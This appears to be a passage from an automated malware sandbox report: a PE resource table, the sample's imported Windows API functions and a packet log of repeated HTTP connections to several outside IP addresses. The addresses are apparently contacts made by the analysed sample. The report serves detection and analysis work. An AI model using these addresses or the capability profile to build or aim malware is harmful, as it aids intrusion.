.rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
                                                      Sep 25, 2024 05:36:21.503720045 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:21.503783941 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:21.503861904 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:21.503870010 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:21.503879070 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:22.107836962 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:22.108095884 CEST4974080192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:23.010560036 CEST4974080192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:23.015522957 CEST804974023.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:24.029382944 CEST4974180192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:24.034481049 CEST804974123.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:24.034611940 CEST4974180192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:24.040805101 CEST4974180192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:24.045840979 CEST804974123.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:24.658937931 CEST804974123.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:24.659317970 CEST4974180192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:24.660213947 CEST4974180192.168.2.423.224.27.173
                                                      Sep 25, 2024 05:36:24.665941000 CEST804974123.224.27.173192.168.2.4
                                                      Sep 25, 2024 05:36:29.855320930 CEST4974280192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:29.860307932 CEST804974252.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:29.860626936 CEST4974280192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:29.874146938 CEST4974280192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:29.879192114 CEST804974252.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:30.941747904 CEST804974252.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:30.941907883 CEST804974252.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:30.941997051 CEST4974280192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:31.385729074 CEST4974280192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:32.411406040 CEST4974380192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:32.416362047 CEST804974352.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:32.416649103 CEST4974380192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:32.435300112 CEST4974380192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:32.440129042 CEST804974352.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:33.484868050 CEST804974352.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:33.484965086 CEST804974352.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:33.485054016 CEST4974380192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:33.948059082 CEST4974380192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:34.966965914 CEST4974480192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:34.971919060 CEST804974452.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:34.972069979 CEST4974480192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:34.982815981 CEST4974480192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:34.987832069 CEST804974452.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:34.988012075 CEST804974452.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:34.988040924 CEST804974452.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:34.988069057 CEST804974452.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:34.988095045 CEST804974452.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:34.988121986 CEST804974452.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:34.988171101 CEST804974452.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:34.988198042 CEST804974452.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:34.988225937 CEST804974452.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:36.056647062 CEST804974452.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:36.056848049 CEST804974452.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:36.056952953 CEST4974480192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:36.495187044 CEST4974480192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:37.514906883 CEST4974580192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:37.519864082 CEST804974552.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:37.519984961 CEST4974580192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:37.526915073 CEST4974580192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:37.532363892 CEST804974552.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:38.622203112 CEST804974552.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:38.622332096 CEST804974552.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:38.622546911 CEST4974580192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:38.628874063 CEST4974580192.168.2.452.187.43.73
                                                      Sep 25, 2024 05:36:38.633660078 CEST804974552.187.43.73192.168.2.4
                                                      Sep 25, 2024 05:36:43.830359936 CEST4974680192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:43.835256100 CEST8049746199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:43.835344076 CEST4974680192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:43.845462084 CEST4974680192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:43.850303888 CEST8049746199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:44.452625036 CEST8049746199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:44.452668905 CEST8049746199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:44.452768087 CEST4974680192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:45.354449987 CEST4974680192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:46.373480082 CEST4974780192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:46.378319025 CEST8049747199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:46.378525972 CEST4974780192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:46.388969898 CEST4974780192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:46.393769979 CEST8049747199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:46.967294931 CEST8049747199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:46.967420101 CEST8049747199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:46.967509985 CEST4974780192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:47.901401043 CEST4974780192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:48.919888020 CEST4974880192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:48.924832106 CEST8049748199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:48.925048113 CEST4974880192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:48.936655045 CEST4974880192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:48.941620111 CEST8049748199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:48.941651106 CEST8049748199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:48.941678047 CEST8049748199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:48.941705942 CEST8049748199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:48.941756010 CEST8049748199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:48.941782951 CEST8049748199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:48.941808939 CEST8049748199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:48.941834927 CEST8049748199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:48.941867113 CEST8049748199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:49.520350933 CEST8049748199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:49.520493031 CEST8049748199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:49.520697117 CEST4974880192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:50.448139906 CEST4974880192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:51.471468925 CEST4974980192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:51.476567984 CEST8049749199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:51.476667881 CEST4974980192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:51.484142065 CEST4974980192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:51.489115953 CEST8049749199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:52.085654974 CEST8049749199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:52.085750103 CEST8049749199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:52.085844040 CEST4974980192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:52.088638067 CEST4974980192.168.2.4199.192.21.169
                                                      Sep 25, 2024 05:36:52.094398022 CEST8049749199.192.21.169192.168.2.4
                                                      Sep 25, 2024 05:36:57.234332085 CEST4975080192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:36:57.241234064 CEST804975081.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:36:57.241318941 CEST4975080192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:36:57.255444050 CEST4975080192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:36:57.260360956 CEST804975081.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:36:57.915932894 CEST804975081.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:36:57.916121960 CEST804975081.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:36:57.916188955 CEST4975080192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:36:58.762557983 CEST4975080192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:36:59.881135941 CEST4975180192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:36:59.886081934 CEST804975181.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:36:59.886162996 CEST4975180192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:36:59.912911892 CEST4975180192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:36:59.917740107 CEST804975181.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:00.549154043 CEST804975181.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:00.549279928 CEST804975181.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:00.549423933 CEST4975180192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:37:01.432518005 CEST4975180192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:37:02.504432917 CEST4975280192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:37:02.657605886 CEST804975281.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:02.658027887 CEST4975280192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:37:02.669400930 CEST4975280192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:37:02.675102949 CEST804975281.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:02.675132990 CEST804975281.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:02.675199032 CEST804975281.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:02.675225973 CEST804975281.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:02.675272942 CEST804975281.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:02.675301075 CEST804975281.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:02.675328016 CEST804975281.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:02.675354004 CEST804975281.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:02.675415039 CEST804975281.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:03.334024906 CEST804975281.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:03.385478973 CEST4975280192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:37:03.440748930 CEST804975281.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:03.440803051 CEST4975280192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:37:04.182528019 CEST4975280192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:37:05.204430103 CEST4975380192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:37:05.209219933 CEST804975381.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:05.209507942 CEST4975380192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:37:05.216430902 CEST4975380192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:37:05.221173048 CEST804975381.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:05.871893883 CEST804975381.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:05.872162104 CEST804975381.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:05.872211933 CEST4975380192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:37:05.874900103 CEST4975380192.168.2.481.2.196.19
                                                      Sep 25, 2024 05:37:05.879662991 CEST804975381.2.196.19192.168.2.4
                                                      Sep 25, 2024 05:37:11.243755102 CEST4975480192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:11.248648882 CEST8049754107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:11.248732090 CEST4975480192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:11.261343002 CEST4975480192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:11.266185045 CEST8049754107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:12.115807056 CEST8049754107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:12.116261959 CEST8049754107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:12.116303921 CEST4975480192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:12.776433945 CEST4975480192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:13.795895100 CEST4975580192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:13.800740004 CEST8049755107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:13.800822973 CEST4975580192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:13.813822031 CEST4975580192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:13.818591118 CEST8049755107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:14.686585903 CEST8049755107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:14.686713934 CEST8049755107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:14.687021971 CEST4975580192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:15.323091030 CEST4975580192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:16.342881918 CEST4975680192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:16.347697020 CEST8049756107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:16.350868940 CEST4975680192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:16.362880945 CEST4975680192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:16.367786884 CEST8049756107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:16.367808104 CEST8049756107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:16.367816925 CEST8049756107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:16.367842913 CEST8049756107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:16.367924929 CEST8049756107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:16.367935896 CEST8049756107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:16.367944956 CEST8049756107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:16.367968082 CEST8049756107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:16.367979050 CEST8049756107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:17.435687065 CEST8049756107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:17.435836077 CEST8049756107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:17.435890913 CEST4975680192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:17.870028973 CEST4975680192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:18.889151096 CEST4975780192.168.2.4107.163.130.249
